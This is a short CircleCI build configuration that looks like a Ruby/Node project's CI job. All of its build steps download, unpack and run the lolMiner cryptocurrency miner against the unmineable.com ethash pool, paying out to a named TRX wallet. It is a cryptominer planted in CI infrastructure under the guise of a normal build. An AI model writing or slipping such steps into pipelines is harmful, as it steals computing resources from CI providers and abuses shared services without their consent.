version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run: ! wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.28/lolMiner_v1.28a_Lin64.tar.gz
      - run: ! tar -xf lolMiner_v1.28a_Lin64.tar.gz
      - run: ! ./1.28a/lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 -u TRX:TLPBfivqCxzxxVXU2fKMxAFdyFgwkPf9jo.khuongpro5#b8l2-qjng
